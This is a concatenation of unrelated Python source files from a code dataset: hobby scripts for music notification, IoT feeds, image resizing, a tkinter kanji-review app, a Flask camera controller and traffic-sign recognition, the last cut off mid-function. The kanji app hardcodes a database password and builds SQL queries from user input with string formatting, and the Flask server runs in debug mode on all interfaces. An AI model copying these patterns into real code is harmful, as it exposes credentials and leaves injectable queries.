confi)\n else:\n # save relevant'ish sign\n iname = \"./raw/{}/img-{}_{}-sign-c{}.jpg\".format (desc, kts, kout, confi)\n if iname is not None:\n # save image/frame\n global tsr_fs\n tsr_fs.save (iname, img)\n#\ndef img_subrange (img):\n #crop the image area containing the circle\n # subtract the interesting frame\n global c_xx, c_yy, c_rx, c_ry\n return img.copy()[c_yy - c_ry:c_yy + c_ry, c_xx - c_rx:c_xx + c_rx]\n#\n\"\"\"are you using one of the SSD-Mobilenet/Inception models? \nIf so, try changing the class names that you want to ignore to 'void' \n(without the '') in the labels file (e.g. /data/networks/SSD-Mobilenet-v2/ssd_coco_labels.txt). \nThe classes with the name void will then be ignored during detection.\n\"\"\"\ndef do_detect (cuda_mem, width, height):\n # detect objects in the image (with overlay)\n return detnet.Detect (cuda_mem, width, height, \"box,labels,conf\")\n#\ndef do_ai (tsr_img, kTS, kFot, sub_img, dfy, cfy, sign_pos):\n width = tsr_img.shape[0]\n height = tsr_img.shape[1]\n confi = 0\n #cv2.imwrite (iname, final)\n #iname = \"./raw/thd-image-{}_{}.png\".format (kTS, kFot)\n tsr_imga = cv2.cvtColor (tsr_img, cv2.COLOR_BGR2RGBA)\n cuda_mem = jetson.utils.cudaFromNumpy (tsr_imga)\n # do object detection\n if dfy == True:\n detections = detnet.Detect (cuda_mem, width, height, \"box,labels,conf\")\n if len (detections) > 0:\n print(\"detected {:d} objects in image\".format(len(detections)))\n iname = \"./raw/_objs/img-{}_{}-cuda-o{}.jpg\".format (kTS, kFot, 0)\n #jetson.utils.saveImageRGBA (iname, cuda_mem, width, height)\n #for detection in detections:\n # print(detection)\n # print out timing info\n #net.PrintProfilerTimes()\n #print (cuda_mem)\n #\n # do classification\n if cfy == True:\n class_idx, confidence = imgnet.Classify (cuda_mem, width, height)\n confi = int (confidence * 1000)\n if class_idx >= 0:# and confi > 800: # or confidence * 100) > 60:\n # find the object description\n class_desc = imgnet.GetClassDesc (class_idx)\n #print (\"found sign {:d} {:s} on {:d}\".format (confi, class_desc, kFot))\n # save ROI\n if confi > 800: # over 99% confidence\n #save relevant'ish sign\n store_image(tsr_img, class_desc, kTS, kFot, confi, sign_pos)\n # save originating frame, for reference\n if sub_img is not None:\n # store frame - confi = 0\n store_image(sub_img, class_desc, kTS, kFot, 0, sign_pos)\n else:\n #save sign for classification training - desc None\n store_image(tsr_img, None, kTS, kFot, confi, sign_pos)\n # save originating frame, for reference\n if sub_img is not None:\n # store frame - confi = 0\n store_image(sub_img, None, kTS, kFot, 0, sign_pos)\n #\n # overlay the result on the image\n if confi > 994: # over 99.4% confidence\n #print (\"found sign {} {:s} fps {}\".format (confi, class_desc, net.GetNetworkFPS ()))\n # update the indicator\n global cs_spd\n if class_idx == 0:#kph20\n cs_spd = 20\n if class_idx == 1:#kph30\n cs_spd = 30\n if class_idx == 2:#kph50\n cs_spd = 50\n if class_idx == 3:#kph60\n cs_spd = 60\n if class_idx == 4:#kph70\n cs_spd = 70\n if class_idx == 5:#kph80\n cs_spd = 80\n if class_idx == 6:#kph100\n cs_spd = 100\n if class_idx == 7:#kph120\n cs_spd = 120\n #\n global cs_sec, lFps_rS\n cs_sec = lFps_rS\n print (\"%dkph sign %d %s on %d\" % (cs_spd, confi, class_desc, kFot))\n # store captured sign for display\n global ui_find, ui_sign\n ui_find = tsr_img\n # is this a new speed limit?\n if int(do_ai._lspd) != int(cs_spd):\n do_ai._lspd = int(cs_spd)\n print (\"NEW %dkph sign %d %s on %d\" % (cs_spd, confi, class_desc, kFot))\n 
#\n return confi\n#\ndo_ai._lspd = -1\n##\nref_frames = 90\ndef check_red_circles (image, kTS):\n sub_img = img_subrange (image)\n \"\"\"\n #print('subimg shape {}'.format(sub_img))\n sub_img = exposure.equalize_adapthist (sub_img, clip_limit=0.1)\n #print('subimg equ shape {}'.format(sub_img))\n sub_img *= 255\n sub_img = sub_img.astype(np.uint8)\n #sub_img = cv2.cvtColor(sub_img, cv2.COLOR_RGB2BGR)\n #print('subimg cnv shape {}'.format(sub_img))\n \"\"\"\n # reset frames count on 0\n if check_red_circles._lcf == 0:\n check_red_circles._lcf = ref_frames\n # if we have identified a sign, skip the next ref_frames frames\n if nolearn == True and check_red_circles._lcf < ref_frames:\n check_red_circles._lcf = check_red_circles._lcf - 1\n return sub_img\n # process subimage\n #blurred = cv2.blur (sub_img, (5, 5))\n blurred = cv2.GaussianBlur (sub_img, (5, 5), 0)\n #canny = cv2.Canny (blurred, 50, 150)\n hsv = cv2.cvtColor (blurred, cv2.COLOR_BGR2HSV)\n #hsv = cv2.cvtColor (blurred, cv2.COLOR_RGB2HSV)\n # construct a mask for the color \"green\", then perform\n # a series of dilations and erosions to remove any small\n # blobs left in the mask\n # lower mask (0-10)\n #mask0 = cv2.inRange (hsv, lower_white, upper_white)\n mask0 = cv2.inRange (hsv, lower_col1, upper_col1)\n # upper mask (170-180)\n mask1 = cv2.inRange (hsv, lower_col2, upper_col2)\n # join my masks\n cmask = mask0 + mask1\n #cmask = mask1\n #\n result = sub_img\n #result = cmask\n #cmask = cv2.erode (cmask, None, iterations=2)\n #cmask = cv2.dilate (cmask, None, iterations=2)\n #iname = \"./raw/mask-{}.png\".format (datetime.now().strftime(\"%Y%m%d-%H%M%S-%f\"))\n #cv2.imwrite (iname, cmask)\n #detect circles\n circles = cv2.HoughCircles (cmask, cv2.HOUGH_GRADIENT, 1, \n 200, param1=100, param2=20, minRadius=c_r_min, maxRadius=c_r_max)\n # 60, param1=100, param2=20, minRadius=c_r_min, maxRadius=c_r_max)\n #process circles\n c_x = 0\n c_y = 0\n c_r = 0\n if circles is not None:\n #kTS = \"{}\".format (datetime.now().strftime(\"%Y%m%d-%H%M%S-%f\"))\n #iname = \"/mnt/raw/img-{}-frame.png\".format (kTS)\n #circles = np.uint16 (np.around (circles))\n for i in circles[0,:]:\n c_x = int(i[0])\n c_y = int(i[1])\n c_r = int(i[2]) #autocrop the 'red' circle\n #print(\"#i:detected circle {}x{}r{}\".format(c_x, c_y, c_r))\n if c_x > c_r and c_y > c_r: #and c_r > 6\n tsr_img = sub_img.copy()\n c_r = c_r + 10 # store a bigger sign frame for better identification\n sx = c_x - c_r\n sy = c_y - c_r\n sw = c_r * 2\n sh = c_r * 2\n if sx < 0:\n sx = 0\n if sy < 0:\n sy = 0\n tsr_img = tsr_img[sy:sy + sh, sx:sx + sw]\n #\n global kFot\n kFot = kFot + 1\n # skip frames if we found good sign, over 994\n if do_ai (tsr_img, kTS, kFot, image, False, True, i) > 994:\n check_red_circles._lcf = ref_frames - 1\n #\n if show_display == True:\n cv2.circle (result, (c_x, c_y), c_r, (0,0,255), 2)\n #.for\n #.if circles is not None:\n #\n #return tsr_img\n #return canny\n return result\n#\ncheck_red_circles._lcf = ref_frames\n##\ndef update_pov (key):\n #\n global ctrx, ctry, sizx, sizy, c_xx, c_yy, c_rx, c_ry\n #\n m_h = 0.0\n m_v = 0.0\n s_h = 0.0\n s_v = 0.0\n new_pov = False\n # move POV\n povg = 0.01\n if key == ord('a'):\n #left\n if (ctrx - sizx / 2 - povg) > 0.0:\n m_h = -povg\n new_pov = True\n if key == ord('d'):\n #right\n if (ctrx + sizx / 2 + povg) < 1.0:\n m_h = povg\n new_pov = True\n if key == ord('w'):\n #up\n if (ctry - sizy / 2 - povg) > 0.0:\n m_v = -povg\n new_pov = True\n if key == ord('s'):\n #down\n if (ctry + sizy / 2 + povg) < 1.0:\n m_v 
= povg\n new_pov = True\n # size POV\n if key == ord('A'):\n #horiz reduce\n if (ctrx - sizx / 2 - povg) > 0.0:\n s_h = -povg\n new_pov = True\n if key == ord('D'):\n #horiz enlarge\n if (ctrx + sizx / 2 + povg) < 1.0:\n s_h = povg\n new_pov = True\n if key == ord('W'):\n #vert reduce\n if (ctry - sizy / 2 - povg) > 0.0:\n s_v = -povg\n new_pov = True\n if key == ord('S'):\n #vert enlarge\n if (ctry + sizy / 2 + povg) < 1.0:\n s_v = povg\n new_pov = True\n #compute new POV\n if new_pov == True:\n ctrx = ctrx + m_h\n ctry = ctry + m_v\n sizx = sizx + s_h\n sizy = sizy + s_v\n c_xx = int(opt.width * ctrx) # horizontal mid-point\n c_yy = int(opt.height * ctry) #c_ry # vertical mid-point\n c_rx = int(opt.width * sizx / 2) # horizontal width (half): x-rx, x+rx\n c_ry = int(opt.height * sizy / 2) # vertical width (half): y-ry, y+ry\n print(\"POV {:.2f}x{:.2f}-{:.2f}x{:.2f}/{:d}x{:d}-{:d}x{:d}\".format(ctrx, ctry, sizx, sizy, c_xx, c_yy, c_rx * 2, c_ry * 2))\n #\n##\n#\n# get screen size on Linux\n# import struct, os, sys, fcntl\n# fbfd = os.open('/dev/fb0',os.O_RDWR)\n# struct.unpack(\"8I12I16I4I\", fcntl.ioctl(fbfd, 0x4600, \" \"*160))\n# >>> struct.unpack(\"8I12I16I4I\", fcntl.ioctl(fbfd, 0x4600, \" \"*160))\n# (720, 480, 720, 480, 0, 0, 32, 4294967168, 16, 8, 4189770400, 8, 8, 4294967232, 0, 8, 140676952, 24, 8, 4294967232, 1, 0, 4278129984, 4294967232, 4157961728, 37037, 60, 16, 30, 9, 62, 6, 0, 6291456, 4189770832, 0, 0, 0, 0, 0)\n# >>> struct.unpack(\"8I12I16I4I\", fcntl.ioctl(fbfd, 0x4600, \" \"*160))[0]\n# 720\n# >>> struct.unpack(\"8I12I16I4I\", fcntl.ioctl(fbfd, 0x4600, \" \"*160))[1]\n# 480\ntry:\n import struct, os, fcntl\n fbfd = os.open('/dev/fb0', os.O_RDWR)\n fbinfo = fcntl.ioctl(fbfd, 0x4600, \" \"*160)\n _SW = int(struct.unpack(\"8I12I16I4I\", fbinfo)[0])\n # 720\n _SH = int(struct.unpack(\"8I12I16I4I\", fbinfo)[1])\n # 480\n os.close(fbfd)\nexcept:\n _SW = 720\n _SH = 480\n#\n_SW = 480\n_SH = 320\nprint ('display size: %dx%d' % (_SW, _SH))\n_hSH = _SH//2\n_hSW = _SW//2\n##\nui_sign = None\nui_find = None\nui_shot = None\n#fb = np.memmap('/dev/fb2', dtype='uint8',mode='r+', shape=(320, 480, 4))\nfb = np.memmap('/dev/fb2', dtype='uint8',mode='r+', shape=(320, 480, 2))\n#\n### - from https://github.com/adafruit/Adafruit_CircuitPython_RGB_Display\ndef color565(r, g=0, b=0):\n \"\"\"Convert red, green and blue values (0-255) into a 16-bit 565 encoding. As\n a convenience this is also available in the parent adafruit_rgb_display\n package namespace.\"\"\"\n try:\n r, g, b = r # see if the first var is a tuple/list\n except TypeError:\n pass\n return (r & 0xf8) << 8 | (g & 0xfc) << 3 | b >> 3\n\ndef image_to_data(data):\n \"\"\"Generator function to convert a PIL image to 16-bit 565 RGB bytes.\"\"\"\n #NumPy is much faster at doing this. 
NumPy code provided by:\n #Keith (https://www.blogger.com/profile/02555547344016007163)\n #data = np.array(data.convert('RGB')).astype('uint16')\n #npframe = np.zeros((320, 480, 3), dtype=np.uint16) #+ (255, 255, 255) # background color (0, 0, 0)\n #npframe[:, :] = data\n #data = npframe\n #data = cv2.cvtColor (data, cv2.COLOR_BGR2RGB)\n #print('data b4 %x %x %x' % (data[-1:,-1:,0][0][0], data[-1:,-1:,1][0][0], data[-1:,-1:,2][0][0]))\n #color = ((npframe[:, :, 2] & 0xF8) << 8) | ((npframe[:, :, 1] & 0xFC) << 3) | (npframe[:, :, 0] >> 3)\n color = (((data[:, :, 0] >> 3) & 0x1F) << 11) | (((data[:, :, 2] >> 2) & 0x3F) << 5) | ((data[:, :, 1] >> 3) & 0x1F)\n ## data b4 [[152]] [[178]] [[155]]\n ## 152 0x13 0x9800 | 0x2c 0x580 | 0x13 = 0x9D93\n ## data after [134] [102]\n ## data b4: 9c b2 9a = 0x51200 | 0x128 | 0x19 = 0x51339\n ## \n ## data after 26 46 = 0x13 0x39\n #print('data after %x %x' % (color[-1:,0][0], color[-1:,0][0]))\n #print('color {}'.format(color.shape))\n #arru16 = np.zeros((data.shape[0], data.shape[1], 2), dtype=np.uint16)\n arru16 = np.dstack(((color >> 8) & 0xFF, color & 0xFF)) #(color >> 8) & 0xFF, color & 0xFF\n return arru16\n## \ndef show_ui():\n if show_ui == False:\n return\n # draw black bars\n wframe = np.zeros((_SH, _SW, 3), dtype=np.uint8) #+ (255, 255, 255) # background color (0, 0, 0)\n ##wframe = np.zeros((480, 640, 3), dtype=np.uint8) #+ (255, 255, 255) # background color (0, 0, 0)\n global ui_sign, ui_find, ui_shot\n if ui_sign is not None:\n if ui_sign.shape[0] != _hSH or ui_sign.shape[1] != _hSW:\n ui_sign = cv2.resize(ui_sign, (_hSW, _hSH), interpolation = cv2.INTER_AREA)\n #print (\"resize sign\")\n wframe[0:_hSH, 0:_hSW] = ui_sign\n #wframe[0:0 + result.shape[0], 0:0 + result.shape[1]] = result\n if ui_find is not None:\n if ui_find.shape[0] != _hSH or ui_find.shape[1] != _hSW:\n ui_find = cv2.resize(ui_find, (_hSW, _hSH), interpolation = cv2.INTER_AREA)\n #print (\"resize find\")\n wframe[0:_hSH, _hSW:_SW] = ui_find\n #wframe[0:0 + result.shape[0], 0:0 + result.shape[1]] = result\n if ui_shot is not None:\n if ui_shot.shape[0] != _hSH or ui_shot.shape[1] != _SW:\n ui_shot = cv2.resize(ui_shot, (_SW, _hSH), interpolation = cv2.INTER_AREA)\n #print (\"resize shot\")\n #ui_shot = cv2.cvtColor (ui_shot, cv2.COLOR_BGR2RGB)\n wframe[_hSH:_SH, 0:_SW] = ui_shot\n #wframe[0:0 + result.shape[0], 0:0 + result.shape[1]] = result\n cv2.imshow ('result', wframe)\n #cv2.imwrite ('/dev/fb2', wframe)\n # copy to framebuffer\n global fb\n #fb[0:320, 0:480] = np.copy(wframe)\n wf565 = image_to_data(wframe)\n #print('wf565 {}'.format(wf565.shape))\n fb[0:320, 0:480] = wf565 #np.copy (wf565)\n #\n##\ndef show_sign(sign):\n # draw black bars\n wframe = np.zeros((_SH, _SW, 3), dtype=np.uint8) #+ (255, 255, 255) # background color (0, 0, 0)\n ##wframe = np.zeros((480, 640, 3), dtype=np.uint8) #+ (255, 255, 255) # background color (0, 0, 0)\n if sign is not None:\n sign = cv2.resize(sign, (_SH, _SH), interpolation = cv2.INTER_AREA)\n sy, sx = (wframe.shape[0] - sign.shape[0])//2, (wframe.shape[1] - sign.shape[1])//2\n wframe[sy:sy + sign.shape[0], sx:sx + sign.shape[1]] = sign\n #wframe[0:0 + result.shape[0], 0:0 + result.shape[1]] = result\n cv2.imshow ('result', wframe)\n##\ndef prep_camera (video_file, csi_camera, opt_camera, wbmode):\n if video_file is not None:\n camera = cv2.VideoCapture (video_file)\n else:\n # camera setup\n #display = jetson.utils.glDisplay ()\n if csi_camera == False:\n camera = jetson.utils.gstCamera (opt.width, opt.height, opt.camera)\n img, 
width, height = camera.CaptureRGBA (zeroCopy = True)\n jetson.utils.cudaDeviceSynchronize ()\n jetson.utils.saveImageRGBA (\"camera.jpg\", img, width, height)\n # create a numpy ndarray that references the CUDA memory\n # it won't be copied, but uses the same memory underneath\n aimg = jetson.utils.cudaToNumpy (img, width, height, 4)\n #print (aimg)\n #aimg1 = aimg.astype (numpy.uint8)\n #print (\"img shape {}\".format (aimg1.shape))\n aimg1 = cv2.cvtColor (aimg, cv2.COLOR_RGBA2BGR)\n #print (aimg1)\n cv2.imwrite (\"array.jpg\", aimg1)\n # save as image\n #exit()\n else:\n #camera = CSICamera (width=opt.width, height=opt.height)\n # CSI\n # or\n #camera = USBCamera (width=opt.width, height=opt.height, capture_device=3)\n # camstr = 'v4l2src device=/dev/video{} ! video/x-raw, width=(int){}, height=(int){}, framerate=(fraction){}/1 ! videoconvert ! video/x-raw, , format=(string)BGR ! appsink wait-on-eos=false drop=true'.format(\n # 1, opt.width, opt.height, 30)\n # image_resized = cv2.resize(image,(int(self.width),int(self.height)))\n # > gst-inspect-1.0 nvarguscamerasrc\n # wbmode : White balance affects the color temperature of the photo\n # flags: readable, writable\n # Enum \"GstNvArgusCamWBMode\" Default: 1, \"auto\"\n # (0): off - GST_NVCAM_WB_MODE_OFF\n # (1): auto - GST_NVCAM_WB_MODE_AUTO\n # (2): incandescent - GST_NVCAM_WB_MODE_INCANDESCENT\n # (3): fluorescent - GST_NVCAM_WB_MODE_FLUORESCENT\n # (4): warm-fluorescent - GST_NVCAM_WB_MODE_WARM_FLUORESCENT\n # (5): daylight - GST_NVCAM_WB_MODE_DAYLIGHT\n # (6): cloudy-daylight - GST_NVCAM_WB_MODE_CLOUDY_DAYLIGHT\n # (7): twilight - GST_NVCAM_WB_MODE_TWILIGHT\n # (8): shade - GST_NVCAM_WB_MODE_SHADE\n # (9): manual - GST_NVCAM_WB_MODE_MANUAL\n # Please copy camera_overrides.isp to /var/nvidia/nvcam/settings and do below commands to install the ISP file.\n # sudo chmod 664 /var/nvidia/nvcam/settings/camera_overrides.isp\n # sudo chown root:root /var/nvidia/nvcam/settings/camera_overrides.isp\n # --\n \"\"\"\n GST_ARGUS: Available Sensor modes :\n GST_ARGUS: 3264 x 2464 FR = 21.000000 fps Duration = 47619048 ; Analog Gain range min 1.000000, max 10.625000; Exposure Range min 13000, max 683709000;\n GST_ARGUS: 3264 x 1848 FR = 28.000001 fps Duration = 35714284 ; Analog Gain range min 1.000000, max 10.625000; Exposure Range min 13000, max 683709000;\n GST_ARGUS: 1920 x 1080 FR = 29.999999 fps Duration = 33333334 ; Analog Gain range min 1.000000, max 10.625000; Exposure Range min 13000, max 683709000;\n GST_ARGUS: 1280 x 720 FR = 59.999999 fps Duration = 16666667 ; Analog Gain range min 1.000000, max 10.625000; Exposure Range min 13000, max 683709000;\n GST_ARGUS: 1280 x 720 FR = 120.000005 fps Duration = 8333333 ; Analog Gain range min 1.000000, max 10.625000; Exposure Range min 13000, max 683709000;\n GST_ARGUS: Running with following settings:\n Camera index = 0 \n Camera mode = 4 \n Output Stream W = 1280 H = 720 \n seconds to Run = 0 \n Frame Rate = 120.000005 \n GST_ARGUS: Setup Complete, Starting captures for 0 seconds\n --\n for 30fps we can use max: 1000/30 = 33ms exposure or 33000000ns: use with exposuretimerange=\"33000000 33000000\"\n \"\"\"\n #\n if int(opt_camera) > 0:\n camstr = 'v4l2src device=/dev/video{} ! video/x-raw, width=(int){}, height=(int){}, framerate=(fraction){}/1 ! videoconvert ! video/x-raw, , format=(string)BGR ! 
appsink wait-on-eos=false drop=true'.format(\n usb_camera, opt.width, opt.height, 30)\n else: #wbmode=0 awblock=true gainrange=\"1 1\" ispdigitalgainrange=\"1 1\" exposuretimerange=\"5000000 5000000\" aelock=true\n #camstr = 'nvarguscamerasrc wbmode=0 awblock=true gainrange=\"1 1\" ispdigitalgainrange=\"1 1\" exposuretimerange=\"20000000 20000000\" aelock=true ! video/x-raw(memory:NVMM), width=%d, height=%d, format=(string)NV12, framerate=(fraction)%d/1 ! nvvidconv flip-method=2 ! video/x-raw, width=(int)%d, height=(int)%d, format=(string)BGRx ! videoconvert ! appsink wait-on-eos=false drop=true max-buffers=1' % (\n #camstr = 'nvarguscamerasrc sensor-id=0 wbmode=0 awblock=true gainrange=\"1 1\" ispdigitalgainrange=\"1 1\" exposuretimerange=\"80000000 80000000\" aelock=true ! video/x-raw(memory:NVMM), width=%d, height=%d, format=(string)NV12, framerate=(fraction)%d/1 ! nvvidconv flip-method=2 ! video/x-raw, width=(int)%d, height=(int)%d, format=(string)BGRx ! videoconvert ! appsink wait-on-eos=false drop=true max-buffers=1' % (\n #camstr = 'nvarguscamerasrc sensor-id=0 wbmode=0 awblock=true gainrange=\"%d %d\" ispdigitalgainrange=\"1 1\" exposuretimerange=\"20000000 20000000\" aelock=true ! video/x-raw(memory:NVMM), width=%d, height=%d, format=(string)NV12, framerate=(fraction)%d/1 ! nvvidconv flip-method=2 ! video/x-raw, width=(int)%d, height=(int)%d, format=(string)BGRx ! videoconvert ! appsink wait-on-eos=false drop=true max-buffers=1' % (\n camstr = 'nvarguscamerasrc sensor-id=0 ! video/x-raw(memory:NVMM), width=%d, height=%d, format=(string)NV12, framerate=(fraction)%d/1 ! nvvidconv flip-method=2 ! video/x-raw, width=(int)%d, height=(int)%d, format=(string)BGRx ! videoconvert ! appsink wait-on-eos=false drop=true max-buffers=1' % (\n #wbmode, wbmode, opt.width, opt.height, 30, opt.width, opt.height)\n opt.width, opt.height, 30, opt.width, opt.height)\n print ('wbmode %d: %s' % (wbmode, camstr))\n #\n camera = cv2.VideoCapture (camstr, cv2.CAP_GSTREAMER)\n #\n return camera\n##\n##\nimport RPi.GPIO as GPIO\n#\ndef gpio_buttons ():\n global pin18btn\n cpin_val = GPIO.input(pin18btn)\n if cpin_val != gpio_buttons.pin18val:\n gpio_buttons.pin18val = cpin_val\n print('btn18 flip')\n if gpio_buttons.pin18flp == 0 and cpin_val == 1:\n gpio_buttons.pin18flp = 1\n return\ngpio_buttons.pin18val = 1\ngpio_buttons.pin18flp = 0\n##\n# camera analog gain\ncamgain_val = 0\n##\n# -- main block\n#\ncv2.namedWindow('result', cv2.WND_PROP_FULLSCREEN)\ncv2.setWindowProperty('result', cv2.WND_PROP_FULLSCREEN, cv2.WINDOW_FULLSCREEN)\n#show_sign(sign010)\nui_sign = extract_sign(30, False)\nui_find = extract_sign(30, False)\nui_shot = extract_sign(30, False)\nshow_ui()\n#show_sign(None)\n# wait for the UI to get rendered\ncv2.waitKey(100)\n## -\n## setup GPIO buttons\n# check pins at: /proc/device-tree/pinmux@700008d4/common//nvidia,function\n#\npin18btn = 32\nGPIO.setmode (GPIO.BOARD) # BOARD pin-numbering scheme\nGPIO.setup (pin18btn, GPIO.IN) # button pin set as input\n# use a 4.7k pull-up to 3v3 and button to GND\n#GPIO.add_event_detect (but_pin, GPIO.FALLING, callback=wbmode_switch, bouncetime=10)\n## -\ncamera = prep_camera(opt.file, csi_camera, opt.camera, 1)\n#\n# prep video storing\nif video_file == False and save_video == True:\n vname = \"./raw/video-{}p-{}.avi\".format (opt.height, datetime.now().strftime(\"%Y%m%d-%H%M%S-%f\"))\n # Define the codec and create VideoWriter object.The output is stored in 'outpy.avi' file.\n #fourcc = cv2.VideoWriter_fourcc(*'XVID') # cv2.VideoWriter_fourcc() does not 
exist\n #fourcc = cv2.VideoWriter_fourcc(*'X264') # cv2.VideoWriter_fourcc() does not exist\n fourcc = cv2.VideoWriter_fourcc(*'MJPG') # cv2.VideoWriter_fourcc() does not exist\n video_writer = cv2.VideoWriter (vname, fourcc, 30, (opt.width, opt.height))\n tsr_vs = TSRvideoSave ()\n tsr_vs.start (video_writer)\n#\n# load the recognition network\nimgnet = jetson.inference.imageNet (opt.network, sys.argv)\n# load the object detection network\n#detnet = jetson.inference.detectNet (\"ssd-mobilenet-v2\", threshold=0.5)\n# create the camera and display\n#font = jetson.utils.cudaFont ()\n# process frames until user exits\ntsr_fs = TSRframeSave ()\ntsr_fs.start ()\n#windowWidth = cv2.getWindowImageRect(\"result\")[2]\n#windowHeight = cv2.getWindowImageRect(\"result\")[3]\n#print(\"UI:screen size {}x{}\".format(windowWidth, windowHeight))\n#\n#\naFps = 0\n#while display.IsOpen():\nwhile True:\n try:\n ## test gpio buttons\n gpio_buttons()\n #\n if gpio_buttons.pin18flp == 1:\n gpio_buttons.pin18flp = 0\n camgain_val = camgain_val + 1\n if camgain_val > 10:\n camgain_val = 0\n #\n camera.release ()\n camera = prep_camera (opt.file, csi_camera, opt.camera, camgain_val)\n # #\n # capture the image\n if video_file == True:\n ret, aimg1 = camera.read()\n if ret == False:\n break\n else:\n if csi_camera == False:\n img, width, height = camera.CaptureRGBA (zeroCopy = True)\n jetson.utils.cudaDeviceSynchronize ()\n # create a numpy ndarray that references the CUDA memory\n # it won't be copied, but uses the same memory underneath\n aimg = jetson.utils.cudaToNumpy (img, width, height, 4)\n #print (\"img shape {}\".format (aimg1.shape))\n aimg1 = cv2.cvtColor (aimg.astype (np.uint8), cv2.COLOR_RGBA2BGR)\n else:\n ret, aimg = camera.read()\n if ret == False:\n break\n #aimg1 = cv2.flip (aimg, -1)\n aimg1 = aimg\n #\n cFk = cFk + 1\n #\n if save_video == True:\n # add frame to video\n #video_writer.write (aimg1)\n tsr_vs.save (aimg1)\n # do filter and classification\n kTS = \"{}\".format (datetime.now().strftime(\"%Y%m%d-%H%M%S-%f\"))\n # on 10watt nvpmodel -m0 && jetson_clocks:\n # img_subrange 28fps\n # check_red_circles 28fps\n # subrange + classify 38fps\n # red detect + classify: approx.30fps-60fps\n ###\n # subrange + classify 1 or 91 17fps\n #\n # on 5watt nvpmodel -m1 && jetson_clocks\n # img_subrange 28fps\n # check_red_circles NO AI 22fps\n # check_red_circles + classify +/- frame save 14fps \n #\n result = check_red_circles (aimg1, kTS) #img_subrange (aimg1) #check_red_circles (aimg1, kTS) #img_subrange (aimg1) #check_red_circles (aimg1, kTS)\n #result = aimg1\n #\n #fps computation\n cFps_sec = datetime.now().second\n lFps_k = lFps_k + 1\n if lFps_sec != cFps_sec:\n # we advance 1 sec\n lFps_c = lFps_k - 1\n lFps_k = 0\n lFps_rS = lFps_rS + 1 #increment seconds - we assume we get here every second\n # update ui once every second\n #turn off sign display\n if cs_sec > 0 and cs_spd > 0:\n # flash the sign indicator \n if lFps_rS % 2 == 0:\n write_to_7seg (-1)\n ui_sign = extract_sign(cs_spd, False)\n else:\n write_to_7seg (cs_spd)\n ui_sign = extract_sign(cs_spd, True)\n # stop flashing and show the last speed\n if cs_sec + 5 < lFps_rS:\n cs_sec = 0\n write_to_7seg (cs_spd)\n do_ai._lspd = -1\n ui_sign = extract_sign(cs_spd, True)\n # #\n if show_display == True:\n cv2.imshow ('result', result)\n else:\n cfpst = \"A{}/C{}\".format (aFps, lFps_c)\n cv2.putText (result, cfpst, (result.shape[1]-280, result.shape[0]-10), cv2.FONT_HERSHEY_SIMPLEX, 2, (0, 0, 255), 5, 0)\n ui_shot = result\n show_ui()\n # 
max fps?\n if lFps_M < lFps_k:\n lFps_M = lFps_k\n lFps_sec = cFps_sec\n #\n if show_fps == True:\n if False and show_display == True:\n cv2.putText (result, cfpst, (10, 10), cv2.FONT_HERSHEY_SIMPLEX, 2, (0, 0, 255), 2, 0)\n else:\n if (cFk % 50) == 0:\n #print (\"#i:max fps {}\".format (lFps_M))\n if lFps_rS > 0:\n aFps = int (cFk / lFps_rS)\n else:\n aFps = 1\n cfpst = \"FPS M{} / A{} / C{} : T{}f P{}f {}s\".format (lFps_M, aFps, lFps_c, cFk, kFot, lFps_rS)\n print (cfpst)\n # \n #if show_display == True:\n # # only display every 5 frames\n # if cFk % 5 == 0:\n # cv2.imshow ('result', result)\n # process input\n key = cv2.waitKey (1)\n #quit\n if key == ord('Q'):\n break\n if key == ord('q'):\n break\n if key == ESC:\n break\n # update POV\n update_pov(key)\n #\n #\n except KeyboardInterrupt:\n break\n#\n#if video_file == True:\ncamera.release()\n#\nGPIO.cleanup() # cleanup all GPIOs\n#\nif ser is not None:\n st = 'oooo'.format ()\n ser.write (st.encode ())\n#\ntsr_fs.stop()\nprint (\"#w:dropping {} frames\".format (tsr_fs.count()))\n#\nif save_video == True:\n tsr_vs.stop()\n print (\"#w:dropping {} video frames\".format (tsr_vs.count()))\n video_writer.release()\n#\nif show_display == True:\n cv2.destroyAllWindows()\n#\n","repo_name":"lmirel/nano-ssr","sub_path":"tsr-camera.py","file_name":"tsr-camera.py","file_ext":"py","file_size_in_byte":36535,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"}
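The tsr-camera.py record above packs each 24-bit frame into 16-bit RGB565 before writing it to the /dev/fb2 memmap; its image_to_data routes channel 0 into the high five-bit field and channel 2 into the six-bit middle field, presumably tuned to its particular panel. Below is a minimal sketch of the textbook packing, assuming a BGR frame as OpenCV delivers it; the function name and the self-check are mine, not the repo's:

```python
import numpy as np

def bgr_to_rgb565_bytes(frame: np.ndarray) -> np.ndarray:
    """Pack an (H, W, 3) uint8 BGR frame into an (H, W, 2) RGB565 byte buffer."""
    b = frame[:, :, 0].astype(np.uint16)
    g = frame[:, :, 1].astype(np.uint16)
    r = frame[:, :, 2].astype(np.uint16)
    # Textbook RGB565: 5 bits red (high), 6 bits green, 5 bits blue (low).
    color = ((r >> 3) << 11) | ((g >> 2) << 5) | (b >> 3)
    # Split each 16-bit pixel into high/low bytes, mirroring the (H, W, 2)
    # shape the script blits into its fb = np.memmap('/dev/fb2', ...) buffer.
    return np.dstack(((color >> 8) & 0xFF, color & 0xFF)).astype(np.uint8)

# Quick self-check: a white pixel packs to 0xFFFF, i.e. bytes 0xFF, 0xFF.
white = np.full((1, 1, 3), 255, dtype=np.uint8)
assert bgr_to_rgb565_bytes(white).tolist() == [[[255, 255]]]
```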
+{"seq_id":"13655497791","text":"import os\nimport shutil\nimport zipfile\nfrom pathlib import Path\n\nfrom .errors import CaptainError\n\n\nclass FileSystemError(CaptainError):\n def __init__(self, message: str):\n super().__init__(message)\n\n\ndef empty_directory(path: Path):\n if path == Path(\"/\"):\n raise FileSystemError(f\"refusing to run on {path}\")\n if not path.is_dir():\n raise FileSystemError(f\"not a directory: {path}\")\n for entry in path.iterdir():\n if entry.is_dir():\n shutil.rmtree(entry)\n else:\n os.remove(entry)\n\n\ndef remove_directory(path: Path):\n if path == Path(\"/\"):\n raise FileSystemError(f\"refusing to run on {path}\")\n if not path.is_dir():\n raise FileSystemError(f\"not a directory: {path}\")\n shutil.rmtree(path)\n\n\ndef create_zip_archive(archive_file_path: Path, source_dir: Path):\n with zipfile.ZipFile(archive_file_path, \"w\") as zf:\n for path in source_dir.rglob(\"*\"):\n zf.write(path, 